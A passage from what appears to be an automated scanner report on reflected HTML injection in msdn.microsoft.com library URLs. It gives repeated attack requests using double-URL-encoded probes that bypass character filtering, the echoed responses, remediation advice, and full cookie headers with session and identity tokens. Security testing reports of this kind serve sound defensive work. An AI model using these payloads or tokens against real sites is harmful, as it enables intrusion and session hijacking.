...[SNIP]...

2.95. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0813%2522%253e%253ca%253e5bed963aadc was submitted in the REST URL parameter 3. This input was echoed as a0813"><a>5bed963aadc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee721044.aspxa0813%2522%253e%253ca%253e5bed963aadc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee721044.aspxa0813"><a>5bed963aadc" />
...[SNIP]...

2.96. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36289%2522%253e%253ca%253eae7249556c5 was submitted in the REST URL parameter 1. This input was echoed as 36289"><a>ae7249556c5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us36289%2522%253e%253ca%253eae7249556c5/library/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us36289"><a>ae7249556c5/library/ee725279" />
...[SNIP]...

2.97. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e35f%2522%253e%253ca%253e9fb18031369 was submitted in the REST URL parameter 2. This input was echoed as 9e35f"><a>9fb18031369 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9e35f%2522%253e%253ca%253e9fb18031369/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9e35f"><a>9fb18031369/ee725279" />
...[SNIP]...

2.98. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919d4%2522%253e%253ca%253e262395ba879 was submitted in the REST URL parameter 3. This input was echoed as 919d4"><a>262395ba879 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee725279.aspx919d4%2522%253e%253ca%253e262395ba879 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee725279.aspx919d4"><a>262395ba879" />
...[SNIP]...

2.99. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5fa%2522%253e%253ca%253ee12a11fc95d was submitted in the REST URL parameter 1. This input was echoed as 2d5fa"><a>e12a11fc95d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us2d5fa%2522%253e%253ca%253ee12a11fc95d/library/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2d5fa"><a>e12a11fc95d/library/ff361664" />
...[SNIP]...

2.100. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de6e%2522%253e%253ca%253ee545caa6f17 was submitted in the REST URL parameter 2. This input was echoed as 5de6e"><a>e545caa6f17 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library5de6e%2522%253e%253ca%253ee545caa6f17/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
